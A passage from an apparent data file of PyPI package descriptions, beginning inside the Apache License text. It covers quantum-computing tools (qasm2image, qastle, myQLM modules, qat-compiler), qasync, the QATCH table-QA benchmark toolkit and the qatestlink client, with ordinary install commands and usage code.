definition,\n\u201ccontrol\u201d means (i) the power, direct or indirect, to cause the\ndirection or management of such entity, whether by contract or\notherwise, or (ii) ownership of fifty percent (50%) or more of the\noutstanding shares, or (iii) beneficial ownership of such entity.\u201cYou\u201d (or \u201cYour\u201d) shall mean an individual or Legal Entity\nexercising permissions granted by this License.\u201cSource\u201d form shall mean the preferred form for making modifications,\nincluding but not limited to software source code, documentation\nsource, and configuration files.\u201cObject\u201d form shall mean any form resulting from mechanical\ntransformation or translation of a Source form, including but\nnot limited to compiled object code, generated documentation,\nand conversions to other media types.\u201cWork\u201d shall mean the work of authorship, whether in Source or\nObject form, made available under the License, as indicated by a\ncopyright notice that is included in or attached to the work\n(an example is provided in the Appendix below).\u201cDerivative Works\u201d shall mean any work, whether in Source or Object\nform, that is based on (or derived from) the Work and for which the\neditorial revisions, annotations, elaborations, or other modifications\nrepresent, as a whole, an original work of authorship. For the purposes\nof this License, Derivative Works shall not include works that remain\nseparable from, or merely link (or bind by name) to the interfaces of,\nthe Work and Derivative Works thereof.\u201cContribution\u201d shall mean any work of authorship, including\nthe original version of the Work and any modifications or additions\nto that Work or Derivative Works thereof, that is intentionally\nsubmitted to Licensor for inclusion in the Work by the copyright owner\nor by an individual or Legal Entity authorized to submit on behalf of\nthe copyright owner. 
For the purposes of this definition, \u201csubmitted\u201d\nmeans any form of electronic, verbal, or written communication sent\nto the Licensor or its representatives, including but not limited to\ncommunication on electronic mailing lists, source code control systems,\nand issue tracking systems that are managed by, or on behalf of, the\nLicensor for the purpose of discussing and improving the Work, but\nexcluding communication that is conspicuously marked or otherwise\ndesignated in writing by the copyright owner as \u201cNot a Contribution.\u201d\u201cContributor\u201d shall mean Licensor and any individual or Legal Entity\non behalf of whom a Contribution has been received by Licensor and\nsubsequently incorporated within the Work.Grant of Copyright License. Subject to the terms and conditions of\nthis License, each Contributor hereby grants to You a perpetual,\nworldwide, non-exclusive, no-charge, royalty-free, irrevocable\ncopyright license to reproduce, prepare Derivative Works of,\npublicly display, publicly perform, sublicense, and distribute the\nWork and such Derivative Works in Source or Object form.Grant of Patent License. Subject to the terms and conditions of\nthis License, each Contributor hereby grants to You a perpetual,\nworldwide, non-exclusive, no-charge, royalty-free, irrevocable\n(except as stated in this section) patent license to make, have made,\nuse, offer to sell, sell, import, and otherwise transfer the Work,\nwhere such license applies only to those patent claims licensable\nby such Contributor that are necessarily infringed by their\nContribution(s) alone or by combination of their Contribution(s)\nwith the Work to which such Contribution(s) was submitted. If You\ninstitute patent litigation against any entity (including a\ncross-claim or counterclaim in a lawsuit) alleging that the Work\nor a Contribution incorporated within the Work constitutes direct\nor contributory patent infringement, then any patent licenses\ngranted to You under this License for that Work shall terminate\nas of the date such litigation is filed.Redistribution. You may reproduce and distribute copies of the\nWork or Derivative Works thereof in any medium, with or without\nmodifications, and in Source or Object form, provided that You\nmeet the following conditions:You must give any other recipients of the Work or\nDerivative Works a copy of this License; andYou must cause any modified files to carry prominent notices\nstating that You changed the files; andYou must retain, in the Source form of any Derivative Works\nthat You distribute, all copyright, patent, trademark, and\nattribution notices from the Source form of the Work,\nexcluding those notices that do not pertain to any part of\nthe Derivative Works; andIf the Work includes a \u201cNOTICE\u201d text file as part of its\ndistribution, then any Derivative Works that You distribute must\ninclude a readable copy of the attribution notices contained\nwithin such NOTICE file, excluding those notices that do not\npertain to any part of the Derivative Works, in at least one\nof the following places: within a NOTICE text file distributed\nas part of the Derivative Works; within the Source form or\ndocumentation, if provided along with the Derivative Works; or,\nwithin a display generated by the Derivative Works, if and\nwherever such third-party notices normally appear. The contents\nof the NOTICE file are for informational purposes only and\ndo not modify the License. 
You may add Your own attribution\nnotices within Derivative Works that You distribute, alongside\nor as an addendum to the NOTICE text from the Work, provided\nthat such additional attribution notices cannot be construed\nas modifying the License.You may add Your own copyright statement to Your modifications and\nmay provide additional or different license terms and conditions\nfor use, reproduction, or distribution of Your modifications, or\nfor any such Derivative Works as a whole, provided Your use,\nreproduction, and distribution of the Work otherwise complies with\nthe conditions stated in this License.Submission of Contributions. Unless You explicitly state otherwise,\nany Contribution intentionally submitted for inclusion in the Work\nby You to the Licensor shall be under the terms and conditions of\nthis License, without any additional terms or conditions.\nNotwithstanding the above, nothing herein shall supersede or modify\nthe terms of any separate license agreement you may have executed\nwith Licensor regarding such Contributions.Trademarks. This License does not grant permission to use the trade\nnames, trademarks, service marks, or product names of the Licensor,\nexcept as required for reasonable and customary use in describing the\norigin of the Work and reproducing the content of the NOTICE file.Disclaimer of Warranty. Unless required by applicable law or\nagreed to in writing, Licensor provides the Work (and each\nContributor provides its Contributions) on an \u201cAS IS\u201d BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\nimplied, including, without limitation, any warranties or conditions\nof TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A\nPARTICULAR PURPOSE. You are solely responsible for determining the\nappropriateness of using or redistributing the Work and assume any\nrisks associated with Your exercise of permissions under this License.Limitation of Liability. In no event and under no legal theory,\nwhether in tort (including negligence), contract, or otherwise,\nunless required by applicable law (such as deliberate and grossly\nnegligent acts) or agreed to in writing, shall any Contributor be\nliable to You for damages, including any direct, indirect, special,\nincidental, or consequential damages of any character arising as a\nresult of this License or out of the use or inability to use the\nWork (including but not limited to damages for loss of goodwill,\nwork stoppage, computer failure or malfunction, or any and all\nother commercial damages or losses), even if such Contributor\nhas been advised of the possibility of such damages.Accepting Warranty or Additional Liability. While redistributing\nthe Work or Derivative Works thereof, You may choose to offer,\nand charge a fee for, acceptance of support, warranty, indemnity,\nor other liability obligations and/or rights consistent with this\nLicense. 
However, in accepting such obligations, You may act only\non Your own behalf and on Your sole responsibility, not on behalf\nof any other Contributor, and only if You agree to indemnify,\ndefend, and hold each Contributor harmless for any liability\nincurred by, or claims asserted against, such Contributor by reason\nof your accepting any such warranty or additional liability.END OF TERMS AND CONDITIONSAPPENDIX: How to apply the Apache License to your work.To apply the Apache License to your work, attach the following\nboilerplate notice, with the fields enclosed by brackets \u201c[]\u201d\nreplaced with your own identifying information. (Don\u2019t include\nthe brackets!) The text should be enclosed in the appropriate\ncomment syntax for the file format. We also recommend that a\nfile or class name and description of purpose be included on the\nsame \u201cprinted page\u201d as the copyright notice for easier\nidentification within third-party archives.Copyright [yyyy] [name of copyright owner]Licensed under the Apache License, Version 2.0 (the \u201cLicense\u201d);\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License athttp://www.apache.org/licenses/LICENSE-2.0Unless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \u201cAS IS\u201d BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.Description: # qasm\nPlatform: UNKNOWN\nRequires-Python: >=3.5\nDescription-Content-Type: text/markdown"} +{"package": "qasm2error", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qasm2image", "pacakge-description": "The qasm2image repository provides functions to represent quantum circuits written following theOpenQASMspecification.InstallationDependenciesThe tool and all the dependencies are available via the PIP tool. 
See the installation instructions below.Installation procedurepip3installcffipip3installqasm2imageUsageIn a Python environnement# Import the functionsfromqasm2imageimportqasm2svgfromqasm2imageimportqasm2png# Generate your QASM string (either read from a file or generate a circuit and ask for its QASM).qasm_str=\"...\"# Define the basis used to represent the circuitbasis='u1,u2,u3,U,cx'# Compute the SVG representationsvg_str=qasm2svg(qasm_str,basis=basis,show_clbits=True)# Compute the PNG representationpng_bytes=qasm2png(qasm_str,basis=basis,show_clbits=True)# Types of the outputsasserttype(svg_str)isstrasserttype(png_bytes)isbytes# Write the result into fileswithopen('circuit.svg','w')assvg_file:svg_file.write(svg_str)# Don't forget to write in *binary* mode for PNGwithopen('circuit.png','wb')aspng_file:png_file.write(png_bytes)In a shell environnementA script is provided to change QASM code directly from the command line.$qasm2image-husage:qasm2image[-h][-bBASIS][--hide-clbits][-sSCALE]input_fileoutput_fileTransformaquantumcircuitinQASMformattoanimageformat.positionalarguments:input_filetheQASMfileimplementingthecircuittotransformoutput_filetheimagefilethatwillbegeneratedbythetooloptionalarguments:-h,--helpshowthishelpmessageandexit-bBASIS,--basisBASISacomma-separatedlistofgatenameswhichrepresentthegatebasisinwhichthecircuitwillbedecomposed--hide-clbitsifpresent,classicalbitswillnotberepresented-sSCALE,--scaleSCALEscaleofthePNGimage.SVGoutputisnotaffectedbythisparameterLicenseThis project is distributed under theCeCILL-Blicense. A copy of the whole license is included\nin the repository.In order to use the work in this repository you have a strong obligation to cite (as stated in the license):The author of the work: Adrien Suau (see on my GitHub page ormail meif any doubt).The CERFACS (Centre Europ\u00e9en de Recherche et de Formation Avanc\u00e9e en Calcul Scientifique).Outputadder.qasmqft.qasminverseqft1.qasminverseqft2.qasmqec.qasmThe same QASM code, but with thehide-clbitsoption set:qasm2image--hide-clbitsqec.{qasm,png}.teleportv2.qasm"} +{"package": "qaspen", "pacakge-description": "QASPEN - From Python To Databases"} +{"package": "qaspen-psycopg", "pacakge-description": "No description available on PyPI."} +{"package": "qassure", "pacakge-description": "Data Quality AuditorThis module provides a useful base for anyone looking to audit data structure to ensure their\nconformance with a given specification. It allows for the creation of a report of all the\ndeficiencies within a file and provides an easy-to-read framework for creating tests.Read thefull documentationfor more details."} +{"package": "qastle", "pacakge-description": "qastle (Query AST Language Expressions)This document describes a language intended to be used inServiceXandfunc_adlfor messages which represent abstract syntax trees (ASTs). The trees specify columnar selections of HEP data.IntroductionInfluencesastmodulein PythonFuncADL natively uses ASTs as represented by Python's standardastmodule, thus it is convenient to base everything at least loosely on Python's ASTs to ease translation. ASTs in Python, however, are extremely dense with information important for a full-featured general programming language but not relevant or useful for our purposes in forming selections of columns.LINQFuncADL is roughly based onLINQtoROOT, which was based on using LINQ queries on data in ROOT format. LINQ is a query language native to C#. The query operators used in FuncADL (Select,SelectMany,Where, etc.) 
are those of LINQ, so many of the AST nodes will need to represent these operators.Common LispLisp is a functional programming language with a minimalist syntax definition. We're aiming to use similar syntax because of how sparse it is, so that representations of AST nodes are very lean.Guiding principlesI try not to deviate from the influences listed above without good reason, since they are all already well-established standards. However, with influences from three different languages, it's impossible to adhere to all of them anyway.For simplificaion and clarity, anything in Python'sastthat does not affect static translation into a columnar selction is removed.Anything that would result in ambiguity when statically converting to a Python AST with LINQ queries or would prevent this conversion from being possible should be explicitly disallowed for easier debugging.I'm trying to keep the syntax both as simple and as uniform as possible while maintaining all necessary functionality. By this, I mean in the sense of the simplicity and uniformity of the definition, which also results in the least complex parsing. Note that this does not result in the most compact AST text possible.Language specificationSyntaxThe syntax/grammar definition is discussedhere. Like Lisp, the language consists solely of s-expressions. S-expressions here represent AST nodes and are either atoms--which include literals and identifiers--or composites of other s-expressions. Literals and names are nearly identical to those in Python. Composites are of the form:( ...)They look like bare lists from Lisp, with the first element describing the type of AST node, and the rest of the elements being the components of the node.SemanticsAll defined s-expressions are listed here, though this specification will be expanded in the future. The symbol*is used as a suffix here in its regex meaning (i.e., zero or more of the object that it follows are expected). 
Except where there is a restriction explicitly mentioned in the templates below, any type of s-expression can used as an element of a composite s-expression.Atomic s-expressions (atoms):NumbersStringsIdentifiersVariable namesReserved identifiers:True,False, andNoneCannot be used as variable namesComposite s-expressions:Lists:(list *)Dictionary:(dict )keysandvaluesmust each be alistAttributes:(attr )attributemust be a string literalSubscripts:(subscript )Function calls:(call *)Conditionals:(if )Unary operators:( )must benotor~Binary operators:( )must be one of+,-,*,/,%,**,//,and,or,&,|,^,<<,>>,==,!=,<,<=,>,>=Lambdas:(lambda )argumentsmust be alistcontaining only variable namesWhere:(Where )predicatemust be alambdawith one argumentSelect:(Select )selectormust be alambdawith one argumentSelectMany:(SelectMany )selectormust be alambdawith one argumentFirst:(First )Last:(Last )ElementAt:(ElementAt )indexmust be an integerContains:(Contains )Aggregate:(Aggregate )funcmust be alambdawith two argumentsCount:(Count )Max:(Max )Min:(Min )Sum:(Sum )All:(All )predicatemust be alambdawith one argumentAny:(Any )predicatemust be alambdawith one argumentConcat:(Concat )Zip:(Zip )OrderBy:(OrderBy )key_selectormust be alambdawith one argumentOrderByDescending:(OrderByDescending )key_selectormust be alambdawith one argumentChoose:(Choose )nmust be an integerExampleThe following query for eight columns:data_column_source.Select(\"lambda Event: (Event.Electrons.pt(),Event.Electrons.eta(),Event.Electrons.phi(),Event.Electrons.e(),Event.Muons.pt(),Event.Muons.eta(),Event.Muons.phi(),Event.Muons.e())\")becomes(Selectdata_column_source(lambda(listEvent)(list(call(attr(attrEvent'Electrons')'pt'))(call(attr(attrEvent'Electrons')'eta'))(call(attr(attrEvent'Electrons')'phi'))(call(attr(attrEvent'Electrons')'e'))(call(attr(attrEvent'Muons')'pt'))(call(attr(attrEvent'Muons')'eta'))(call(attr(attrEvent'Muons')'phi'))(call(attr(attrEvent'Muons')'e')))))Seethis Jupyter notebookfor a more thorough example.Nota beneThe mapping between Python and qastle expressions is not strictly one-to-one. There are some Python nodes with more specific functionality than needed in the textual AST representation. 
For example, all Pythontuples are converted to(list)s by qastle."} +{"package": "qastutil", "pacakge-description": "qastutilAuthor: Dr Jie Zheng\nv1.0 2023RIntroductionSome quick astronomical functions.Functionsdec2dms: transfer decimal to sexagesimal deg-min-sec, for Decdec2hms: transfer decimal to sexagesimal hour-min-sec, for RAdms2dec: transfer sexagesimal deg-min-sec to decimal, for Dechms2dec: transfer sexagesimal hour-min-sec to decimal, for RAcoorddec2dms: transfer astropy.coord.dec to deg-min-seccoordra2hms: transfer astropy.coord.ra to hour-min-sechour2str: transfer decimal hour to hour-min-sechourangle: computer hour angle between lst and raangle_dis: distance between two angles, result between -180 and +180distance: distance between two sphere pointsazalt: az & alt for object (ra, dec) at lat, lstmjd: from y, m, d, h, s, s, tz to mjdday_of_year: day serial number in given yearfmst: fast midnight sidereal timemjd2: from y, m, d, h, s, s, tz to mjdnight_len: n of hours from sunset to sunrisenight_time: sunset and sunrise for given yr, mn, dy, lon, lat, tzmjd_of_night: get 4-digit mjd code for the site, using local 18:00mjd2hour: Extract hour part from mjdsun_action: Get time of sun pass specified altitude, in this nightairmass: airmass from lat, lst, ra, declst: get local sidereal time for longitude at mjd, no astropysun_pos: sun position of given mjdmoon_pos: moon position of given mjdmoon_phase: moon phase of given mjd, by sun-earth-moon anglemoon_phase2: moon phase by moon cycle"} +{"package": "qasymphony-qtest-library", "pacakge-description": "Python QTest LibraryA client library to interact with the qTest API, which one can reference here:api.qasymphony.comInstallationpipinstallqasymphony-qtest-libraryUsagefromqtestimportqtestqtest=qtest.QTestClient(username=\"username@yourco.com\",password=\"password\",site_name=\"yourco\")all_projects=qtest.get_projects()project_names=[project['name']forprojectinall_projects]print(project_names)"} +{"package": "qasync", "pacakge-description": "qasyncIntroductionqasyncallows coroutines to be used in PyQt/PySide applications by providing an implementation of thePEP 3156event loop.Withqasync, you can useasynciofunctionalities directly inside Qt app's event loop, in the main thread. Using async functions for Python tasks can be much easier and cleaner than usingthreading.ThreadorQThread.If you need some CPU-intensive tasks to be executed in parallel,qasyncalso got that covered, providingQEventLoop.run_in_executorwhich is functionally identical to that ofasyncio.Basic ExampleimportsysimportasynciofromqasyncimportQEventLoop,QApplicationfromPySide6.QtWidgetsimportQWidget,QVBoxLayoutclassMainWindow(QWidget):def__init__(self):super().__init__()self.setLayout(QVBoxLayout())self.lbl_status=QLabel(\"Idle\",self)self.layout().addWidget(self.lbl_status)@asyncCloseasyncdefcloseEvent(self,event):pass@asyncSlot()asyncdefonMyEvent(self):passif__name__==\"__main__\":app=QApplication(sys.argv)event_loop=QEventLoop(app)asyncio.set_event_loop(event_loop)app_close_event=asyncio.Event()app.aboutToQuit.connect(app_close_event.set)main_window=MainWindow()main_window.show()withevent_loop:event_loop.run_until_complete(app_close_event.wait())More detailed examples can be foundhere.The Future ofqasyncqasyncis a fork ofasyncqt, which is a fork ofquamash.qasyncwas created because those are no longer maintained. 
May it live longer than its predecessors.qasyncwill continue to be maintained, and will still be accepting pull requests.RequirementsPython >= 3.8PyQt5/PyQt6 or PySide2/PySide6qasyncis tested on Ubuntu, Windows and MacOS.If you need Python 3.6 or 3.7 support, use thev0.25.0tag/release.InstallationTo installqasync, usepip:pip install qasyncLicenseYou may use, modify and redistribute this software under the terms of theBSD License. SeeLICENSE."} +{"package": "qat", "pacakge-description": "Qat (Qt Application Tester)Qat is a testing framework for Qt-based applications.Qat provides a Python API to interact with any existing Qt application by accessing QML/QtQuick/QWidget elements and simulating user manipulations.It is also integrated tobehaveto support Behavior-Driven Development (BDD) with theGherkin language.Although Qat uses the GUI to interact with the tested application, it is oriented towards BDD and functional testing rather than pure UI or non-regression testing.The main objective of Qat is to provide quick feedback to developers and easy integration to build systems.The complete documentation is available onreadthedocsand on Qat'sGitlab project."} +{"package": "qatamagochi", "pacakge-description": "qatamagochiInstall qatamagochi from PyPi.pipinstallqatamagochiExample# Import libraryfromqatamagochiimportQatamagochi# Initializemodel=Qatamagochi(name='Daniel',tamagochi_name='Dinosaurio')# Run the modelmodel.speak()"} +{"package": "qatch", "pacakge-description": "QATCH: Benchmarking SQL-centric tasks with Table Representation Learning Models on Your DataThis repository is the official implementation\nofQATCH: Benchmarking SQL-centric tasks with Table Representation Learning Models on Your Datato appear in NeurIPS Dataset and Benchmark track 2023.\ud83d\udd25 Updates[2024-Jan-22]:\nAddDAMBER: (Data-AMBiguity testER)[2024-Jan-10]: Add JOIN tests for proprietary data[2023-Dec-15]: new License: Apache-2.0[2023-Nov-06]: Camera ready version is now available!check it out![2023-Nov-05]: QATCH can now be donwloaded from pip! Do not forget to check\nthedocumentation!\ud83c\udff4\udb40\udc76\udb40\udc75\udb40\udc6d\udb40\udc61\udb40\udc70\udb40\udc7f OverviewWhat is QATCH?Query-AidedTRLChecklist (QATCH) is a toolbox to highlight TRL models\u2019 strengths\nand weaknesses on prorietary tables for Question Answering (QA) and Semantic Parsing (SP).How does it work?Given a proprietary database as input, it generates a testing checklist for QA and SP.More specifically?A query generation algorithm crafts tests by means of the expressive power of SQL.Ok cool, that's it?To evaluate the model's predictions, we propose 5 new metrics intra and inter tuple.Where is processed the data?The data is processed locally. We do not store any data. If you use the ChatGPT\nwrapper the data is processed by OpenAI.Where can I check the results?The generated tests along with the predictions and the metric scores can be\ndownloadedhere. This is to\nprevent the costly generation of test results with the openAI API and to build trust in our results.QATCH's automatically generates and evaluates test checklists on TRL models based on the three-step process depicted\nbelow:QATCH-Generate. It generates a set of queries tailored to proprietary data. 
For each query it formulates both the\nSQL declaration, its free-text version, and the expected ground truth consisting of table instances.\nThe SQL declaration expresses the logical complexity of the query and reflects the presence/absence of specific\nfeatures peculiar to the relational data model, such as the presence of missing values and duplicate values.TRL Model Predictions. It processes the tests for various TRL models and tasks. The current toolbox version\nsupports three Table Representation Learning (TRL) models for\nQA:TAPAS,TAPEXandOmnitab.\nIn addition, two LLMs are implemented for QA and SPChatGPT 3.5(need the API key)\nandLLama2(need the HuggingFace token).QATCH-Evaluate. It evaluates the models\u2019 outputs according to a set of cross-task performance metrics.QATCH\u2019s metrics are computed between the model output (prediction) and expected\nground-truth results (target). The target is the answer of the NL question \"Show me all the data\" over\na table with three tuples and two attributes.Given the ground truth result (target) with three tuples over two attributes, we report the metric values for five\npredictions, coming either from a QA or from the execution of a query in SP. More details can be found in\nthemetricsfolderWho should use QATCH?QATCH is designed to create \"behavioral testing\" checklists for QA and SP tasks.\nThe checklist is used to understand in which cases the models fail when processing proprietary data for QA and SP tasks.In a corporate setting, there are at least three scenarios where a given TRL model needs to be evaluated\nagainst proprietary datasets:Comparison: Compare TRL models fine-tuned on private examples to see which one performs best.Validation: As crafting examples is expensive, verify when the quality meets the requirements.Maintenance: Fine-tuned models need to be re-calibrated to avoid data and conceptual shifting,\ncontinuous evaluation helps the identification of this issue.But the usage of QATCH is not limited to TRL models. 
Indeed, we propose two scenarios\nwhere QATCH can be used with LLMs:LLM compatibility version: Compare different version of the same LLMs to see the best performing one.Prompt engineering: Analyse the best prompt definition based on the proprietary data.Use case example of engineer Walter.\nWith QATCH it is able to create a model ranking on his proprietary data for QA and SP.Project|--metric_evaluator.py# user interface to calculate metrics for QA or SP|--test_generator.py# user interface to run different SQL generators|--database_reader|--single_database.py# initialise single database|--multiple_databases.py# handle multiple single database instances|--metrics|--metric_evaluator.py# wrapper to initialise the user selected metrics|--abstract_metric.py# abstract class to handle common metric methods|--cell_precision_tag.py# implement cell precision tag|--cell_recall_tag.py# implement cell recall tag|--tuple_cardinality_tag.py# implement tuple cardinality tag|--tuple_constraint_tag.py# implement tuple constraint tag|--tuple_order_tag.py# implement tuple order tag|--models|--chatgpt|--abstract_chatgpt.py# abstract class to handle common methods for ChatGPT|--chatgpt_QA.py# implement chatgpt for QA task|--chatgpt_SP.py# implement chatgpt for SP task|--chatgpt|--abstract_llama2.py# abstract class to handle common methods for LLama2|--llama2_QA.py# implement llama2 for QA task|--llama2_SP.py# implement llama2 for SP task|--abstract_model.py# abstract class to handle common model methods|--tapas.py# implement input processing and the prediction for TAPAS|--tapex.py# implement input processing and the prediction for TAPEX|--omnitab.py# implement the input processing and the prediction for Omnitab|--sql_generator|--abstract_sql_generator.py# handle common methods for SQL generators|--select_generator.py# implement SELECT tests|--distinct_generator.py# implement DISTINCT tests|--orderby_generator.py# implement ORDERBY tests|--where_generator.py# implement WHERE tests|--groupby_generator.py# implement GROUPBY tests|--having_generator.py# implement HAVING tests|--simple_agg_generator.py# implement SIMPLE AGG tests|--null_generator.py# implement NULL generator tests\u26a1\ufe0f QuickstartInstallationYou can install QATCH by running the following commands:#Usingpoetry(recommended)poetry add QATCH#Usingpippip install QATCHSince QATCH is intended to be used without the inference step, the base installation does not come\nwith the models' requirements.\nHowever, in case you want to use our implementation you can add the extras requirements.#Usingpoetry(recommended)poetry add QATCH -E model#Usingpippip install QATCH[model]How to use QATCH with my data?Load your input dataCreate a connection between your data and the tool.\nIf your data is not stored in a sqlite database you can use our code to generate it.importpandasaspdfromqatch.database_readerimportSingleDatabasedata={\"year\":[1896,1900,1904,2004,2008,2012],\"city\":[\"athens\",\"paris\",\"st. 
louis\",\"athens\",\"beijing\",\"london\"]}table=pd.DataFrame.from_dict(data)db_tables={'olympic_games':table}# create database connection# create the sqlite database in \"db_save_path/db_id/db_id.sqlite\".db=SingleDatabase(db_path=\"db_save_path\",db_name=\"db_id\",tables=db_tables)Now we can create a connection with multiple databases:fromqatch.database_readerimportMultipleDatabases# The path to multiple databasesdb_save_path='test_db'databases=MultipleDatabases(db_save_path)QATCH-Generate: Generates the testsfromqatchimportTestGenerator# init generatortest_generator=TestGenerator(databases=databases)# generate tests for each database and for each generatortests_df=test_generator.generate()TRL Model Predictions: if you want to use any version of Tapas/Tapex for QA in Huggingface or chatGPT you can use the\nalready implemented modules but it is NOT mandatory.fromtqdmimporttqdmfromqatch.modelsimportTapas# init the modelmodel=Tapas(model_name=\"google/tapas-large-finetuned-wtq\")# iterate for each row and run predictiontqdm.pandas(desc=f'Predicting for{model.name}')tests_df[f'predictions_{model.name}']=tests_df.progress_apply(lambdarow:model.predict(table=databases.get_table(db_id=row['db_id'],tbl_name=row['tbl_name']),query=row['question'],tbl_name=row['tbl_name']),axis=1)QATCH-Evaluate: Evaluate the results.fromqatchimportMetricEvaluatorevaluator=MetricEvaluator(databases=databases)tests_df=evaluator.evaluate_with_df(tests_df,prediction_col_name=\"\",task=\"QA or SP\")The final dataframe contains:db_id: The database name associated with the test.tbl_name: The table name associated with the test.sql_tags: the SQL generator associated with the test.query: The generated query from step 1.question: The generated question from step 1. Used as input for the model.predictions_: The predicted query/cells from step 2.5 metrics: The metrics used to evaluate the models.\ud83c\udff0 Reproduce ExperimentsInstall and prepare dataWe suggest to create adatafolder in the project to store all the data but it is not mandatory.In case the input data are not in this folder, remember to change inread_datathebase_pathargumentmkdirdata/These are the tables we use to generate the results in the main paper.Notice that QATCH perfectly works with any table and the following are only a selected sample to higlight results in the\npaper.DataLink# rows# categorical cols# numerical colsexample colsSpiderlink----Sales-transactionslink500k53ProductNo, DateFitness-trackerslink56583Brand Name, DisplayAccount-fraudlink1M426DaysSinceRequest, Velocity6hLate-paymentlink246666InvoiceDate, DisputedHeart-attacklink303111# trtbps, # oldpeakBreast-cancerlink68656pgr, rfstimeAdult-censuslink32.6k96education, fnlwgtMushroomslink8.1k230cap-shape, ring-typeRun ExperimentsCurrent version of QATCH supports SP and QA tasks, however since we rely on third-party models\nnot all the experiments can be run using QATCH.\nSupported models:QA models: Tapas, Tapex, ChatGPT_QA, LLama2_QA and OmnitabSP models: ChatGPT_SP and LLama2_SPFor the proprietary data:pythonmain_reproducibility.py-gtfproprietary--taskQA--model_nameTapas-dsptest_db--inject_null_percentage0.0For Spider:pythonmain_reproducibility.py-gtfspider--taskQA--model_nameTapas-dsptest_db--inject_null_percentage0.0Instead, for the not supported models (because an API does not exist),\nthe only difference is that the prediction phase has to be done by the user."} +{"package": "qat-comm", "pacakge-description": "Module qat-commThis moduleqat-commis part ofmyQLMproject. 
myQLM is a quantum\nsoftware stack for writing, simulating, optimizing, and executing quantum programs. This module\nprovides all the data-structures needed bymyQLMPrerequisitesThis version of myQLM works on both Windows, macOS and Linux for different versions of Python 3. Please look at thecompatibility matrixto ensure myQLM is installable on your computer.This module can be installed by typing the following command:pip install myqlmLicensemyQLM EULA"} +{"package": "qat-compiler", "pacakge-description": "QAT(Quantum Assembly Toolchain) is a low-level quantum compiler and runtime which facilitates executing quantum IRs\nsuch asQASM,OpenPulseandQIRagainst QPU drivers.\nIt facilitates the execution of largely-optimised code, converted into abstract pulse- and hardware-level instructions,\nwhich are then transformed and delivered to an appropriate driver.InstallationQAT can be installed fromPyPIvia:pip install qat-compilerBuilding from SourceWe usepoetryfor dependency management and run onPython 3.8+.\nOnce both of these are installed run this in the root folder to install all the dependencies that you need:poetry installNoteIf you are contributing to the project we recommend that you also runpoetry run pre-commit installto enable pre-commit checks.RoadmapThis is a list of what we\u2019re currently working on! If you want to get involved, contact the person or group linked.In-development:Classical-quantum hybrid computation.John DumbellRuntime-embedded QEC.Jamie FrielDesigning / verifying suitability:Distributed QPU execution.John DumbellTo-do:Full QASM v3 support. Currently waiting for available parsers.ContributingTo take the first steps towards contributing to QAT, visit ourcontributiondocuments, which provides details about our\nprocess.\nWe also encourage new contributors to familiarise themselves with thecode of conductand to adhere to these\nexpectations.Where to get helpFor support, please reach out in theDiscussionstab of this repository or file anissue.LicenceThis code in this repository is licensed under the BSD 3-Clause Licence.\nPlease seeLICENSEfor more information.FeedbackPlease let us know your feedback and any suggestions by reaching out inDiscussions.\nAdditionally, to report any concerns orcode of conductviolations please use thisform.FAQWhy is this in Python?Mixture of reasons. Primary one is that v1.0 was an early prototype and since the majority of the quantum community\nknow Python it was the fastest way to build a system which the most people could contribute to building. The API\u2019s would\nalways stick around anyway, but as time goes on the majority of its internals has been, is being, or will be moved to Rust/C++.Where do I get started?Our tests are a good place to start as they will show you the various ways to run QAT. Running and then stepping\nthrough how it functions is the best way to learn.We have what\u2019s known as an echo model and engine which is used to test QATs functionality when not attached to a QPU.\nYou\u2019ll see these used almost exclusively in the tests, but you can also use this model to see how QAT functions on\nlarger and more novel architectures.High-level architectural documents are incoming and will help explain its various concepts at a glance, but\nright now aren\u2019t complete.What OS\u2019s does QAT run on?Windows and Linux are its primary development environments. Most of its code is OS-agnostic but we can\u2019t\nguarantee it won\u2019t have bugs on untried ones. 
Dependencies are usually where you'll have problems, not the core\nQAT code itself.If you need to make changes to get your OS running feel free to PR them to get them included.I don't see anything related to OQC's hardware here!Certain parts of how we run our QPU have to stay proprietary and for our initial release we did not have time to\nproperly unpick this from things we can happily release. We want to release as much as possible and as you're\nreading this we are likely busy doing just that.Do you have your own simulator?We have a real-time chip simulator that is used to help test potential changes and their ramifications to hardware.\nIt focuses on accuracy and testing small-scale changes so should not be considered a general simulator. 3/4 qubit\nsimulations is its maximum without runtime being prohibitive."}
+{"package": "qat-core", "pacakge-description": "Module qat-coreThis moduleqat-coreis part ofmyQLMproject. myQLM is a quantum\nsoftware stack for writing, simulating, optimizing, and executing quantum programs. This module is the\ncore ofmyQLMPrerequisitesThis version of myQLM works on both Windows, macOS and Linux for different versions of Python 3. Please look at thecompatibility matrixto ensure myQLM is installable on your computer.This module can be installed by typing the following command:pip install myqlmLicensemyQLM EULA"}
+{"package": "qat-devices", "pacakge-description": "Module qat-devicesThis moduleqat-devicesis part ofmyQLMproject. myQLM is a quantum\nsoftware stack for writing, simulating, optimizing, and executing quantum programs.This module provides a set of predefined HardwareSpecs objects corresponding to existing or common topologies.PrerequisitesThis version of myQLM works on both Windows, macOS and Linux for different versions of Python 3. 
Please look at thecompatibility matrixto ensure myQLM is installable on your computer.This module can be installed by typing the following command:pip install myqlmLicensemyQLM EULA"} +{"package": "qa_tech_basic", "pacakge-description": "No description available on PyPI."} +{"package": "qa_tech_basic_37", "pacakge-description": "No description available on PyPI."} +{"package": "qatestlink", "pacakge-description": "qatestlink XMLRPC manager for TestlinkBranchLinux DeployWindows DeploymasterPython tested versions3.73.63.53.4>=3.3SupportedSupportedSupportedSupportedNot SupportedHow to install ?Install from PIP :pip install qatestlinkInstall from setup.py file :python setup.py installDocumentationHow to use library, searching forUsage Guide.How to exec tests ?Install dependencies for tests :pip install-rrequirements-tests.txtTests from setup.py file :python setup.py testInstall TOX :pip install toxTests from tox :tox-l&& tox-eTOX_ENV_NAME(see tox.ini file to get environment names)TOX Env nameEnv descriptionpy34,py35,py36Python supported versionsdocsGenerate doc HTML in /docsflake8Exec linter in qalab/ tests/coverageGenerate XML and HTML reportsConfiguration File{\n \"connection\":{\n \"is_https\": false,\n \"host\": 